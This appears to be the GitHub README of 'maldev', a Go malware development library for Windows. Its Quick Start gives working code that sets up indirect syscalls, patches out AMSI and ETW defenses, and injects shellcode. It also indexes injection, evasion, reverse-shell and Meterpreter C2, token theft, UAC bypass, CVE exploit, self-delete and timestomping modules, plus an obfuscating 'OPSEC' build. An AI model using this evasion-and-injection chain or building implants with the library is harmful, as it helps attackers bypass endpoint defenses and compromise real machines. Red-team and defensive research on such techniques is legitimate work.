oioio-space/maldev
GitHub: oioio-space/maldev
A modular Go malware development library providing complete offensive security capability primitives: code injection, defense evasion, syscall bypass and more.
Stars: 0 | Forks: 0
# maldev
A modular Go malware development library for offensive and defensive security research.
[pkg.go.dev reference](https://pkg.go.dev/github.com/oioio-space/maldev)
## Installation
```sh
go get github.com/oioio-space/maldev@latest
```
## Quick Start
```go
import (
	"github.com/oioio-space/maldev/evasion"
	"github.com/oioio-space/maldev/evasion/amsi"
	"github.com/oioio-space/maldev/evasion/etw"
	"github.com/oioio-space/maldev/inject"
	wsyscall "github.com/oioio-space/maldev/win/syscall"
)

// 1. Create a Caller for stealthy syscalls
caller := wsyscall.New(wsyscall.MethodIndirect,
	wsyscall.Chain(wsyscall.NewHashGate(), wsyscall.NewHellsGate()))

// 2. Disable defenses
evasion.ApplyAll([]evasion.Technique{
	amsi.ScanBufferPatch(),
	etw.All(),
}, caller)

// 3. Inject shellcode
injector, _ := inject.NewWindowsInjector(&inject.WindowsConfig{
	Config:        inject.Config{Method: inject.MethodCreateThread},
	SyscallMethod: wsyscall.MethodIndirect,
})
injector.Inject(shellcode)
```
## Documentation
### 📖 Guides
| Guide | Description |
|-------|-------------|
| **[Getting Started](docs/getting-started.md)** | First steps: concepts, terminology, your first implant |
| **[Architecture](docs/architecture.md)** | Layered design, dependency flow, Mermaid diagrams |
| **[OPSEC Build Pipeline](docs/opsec-build.md)** | garble, pe/strip, CallByHash: operation-oriented builds |
| **[MITRE ATT&CK + D3FEND](docs/mitre.md)** | Complete technique mapping, including defensive countermeasures |
### 🔧 Technique Reference
Each technique has a dedicated page with a beginner-level explanation, technical details, diagrams, usage examples and comparisons with other tools.
| Category | Techniques |
|----------|-----------|
| **[Injection](docs/techniques/injection/README.md)** | [CreateRemoteThread](docs/techniques/injection/create-remote-thread.md) · [Early Bird APC](docs/techniques/injection/early-bird-apc.md) · [Thread Hijacking](docs/techniques/injection/thread-hijack.md) · [Module Stomping](docs/techniques/injection/module-stomping.md) · [Section Mapping](docs/techniques/injection/section-mapping.md) · [Callback Execution](docs/techniques/injection/callback-execution.md) · [Thread Pool](docs/techniques/injection/thread-pool.md) · [KernelCallbackTable](docs/techniques/injection/kernel-callback-table.md) · [Phantom DLL](docs/techniques/injection/phantom-dll.md) · [Argument Spoofing](docs/techniques/injection/process-arg-spoofing.md) |
| **[Evasion](docs/techniques/evasion/README.md)** | [AMSI Bypass](docs/techniques/evasion/amsi-bypass.md) · [ETW Patching](docs/techniques/evasion/etw-patching.md) · [ntdll Unhooking](docs/techniques/evasion/ntdll-unhooking.md) · [Sleep Mask](docs/techniques/evasion/sleep-mask.md) · [Hardware Breakpoints](docs/techniques/evasion/hw-breakpoints.md) · [ACG + BlockDLLs](docs/techniques/evasion/acg-blockdlls.md) · [Anti-Analysis](docs/techniques/evasion/anti-analysis.md) |
| **[Syscalls](docs/techniques/syscalls/README.md)** | [Direct vs Indirect](docs/techniques/syscalls/direct-indirect.md) · [API Hashing](docs/techniques/syscalls/api-hashing.md) · [SSN Resolvers](docs/techniques/syscalls/ssn-resolvers.md) |
| **[C2 & Transport](docs/techniques/c2/README.md)** | [Reverse Shell](docs/techniques/c2/reverse-shell.md) · [Meterpreter](docs/techniques/c2/meterpreter.md) · [Transport](docs/techniques/c2/transport.md) · [Malleable HTTP](docs/techniques/c2/malleable-profiles.md) |
| **[PE Manipulation](docs/techniques/pe/README.md)** | [Strip & Sanitize](docs/techniques/pe/strip-sanitize.md) · [BOF Loader](docs/techniques/pe/bof-loader.md) · [Morph](docs/techniques/pe/morph.md) |
| **[Cleanup](docs/techniques/cleanup/README.md)** | [Self-Delete](docs/techniques/cleanup/self-delete.md) · [Timestomping](docs/techniques/cleanup/timestomp.md) · [Memory Wipe](docs/techniques/cleanup/memory-wipe.md) |
| **[Tokens & Privileges](docs/techniques/tokens/README.md)** | [Token Theft](docs/techniques/tokens/token-theft.md) · [Impersonation](docs/techniques/tokens/impersonation.md) · [Privilege Escalation](docs/techniques/tokens/privilege-escalation.md) |
| **[Crypto & Encoding](docs/techniques/crypto/README.md)** | [Payload Encryption](docs/techniques/crypto/payload-encryption.md) |
### 🧪 Composition Examples
| Example | Demonstrates |
|---------|---------------------|
| **[Basic Implant](docs/examples/basic-implant.md)** | Evasion → Decrypt → Inject → Sleep mask |
| **[Evasive Injection](docs/examples/evasive-injection.md)** | Hardware breakpoints → Section mapping vs Module stomping vs Callback |
| **[Full Chain](docs/examples/full-chain.md)** | Recon → Evasion → Injection → C2 → Post-exploitation → Cleanup |
### 📚 API Reference
Detailed per-package API documentation (function signatures, parameters, return values):
| Area | Document |
|--------|------|
| Evasion API | [docs/evasion.md](docs/evasion.md) |
| Injection API | [docs/injection.md](docs/injection.md) |
| Syscall API | [docs/syscalls.md](docs/syscalls.md) |
| C2 API | [docs/c2.md](docs/c2.md) |
| Windows Primitives | [docs/win.md](docs/win.md) |
| PE Manipulation | [docs/pe.md](docs/pe.md) |
| Crypto & Encoding | [docs/crypto.md](docs/crypto.md) |
| Cleanup API | [docs/cleanup.md](docs/cleanup.md) |
| System Info | [docs/system.md](docs/system.md) |
| Privileges & Exploitation | [docs/privilege.md](docs/privilege.md) |
| Process Management | [docs/process.md](docs/process.md) |
## Build
```sh
make build    # standard development build
make release  # OPSEC build (garble + strip + trimpath)
make debug    # debug build (with logging)
make test     # run all tests
make verify   # build + test + cross-compile
```
**Requirements:** Go 1.21+ · No Windows SDK headers required · CGO optional
## Project Structure
```text
maldev/
├── crypto/ encode/ hash/ random/ useragent/
├── win/api/ win/syscall/ win/ntapi/ win/token/ win/privilege/
├── evasion/amsi/ evasion/etw/ evasion/unhook/ evasion/sleepmask/ evasion/hwbp/
├── inject/ process/enum/ pe/strip/ pe/bof/ pe/morph/
├── c2/shell/ c2/transport/ c2/meterpreter/ c2/cert/
├── cleanup/memory/ cleanup/selfdelete/ cleanup/timestomp/ cleanup/wipe/
├── uacbypass/ exploit/cve202430088/ system/drive/ system/folder/
├── internal/log/ internal/compat/ testutil/ cmd/rshell/
└── docs/ .claude/skills/ Makefile
```
## Acknowledgements
Inspired by and compared against [D3Ext/maldev](https://github.com/D3Ext/maldev) by [@D3Ext](https://github.com/D3Ext). Some improvements draw on its implementation patterns.
## License
For authorized security research, red team operations and penetration testing only.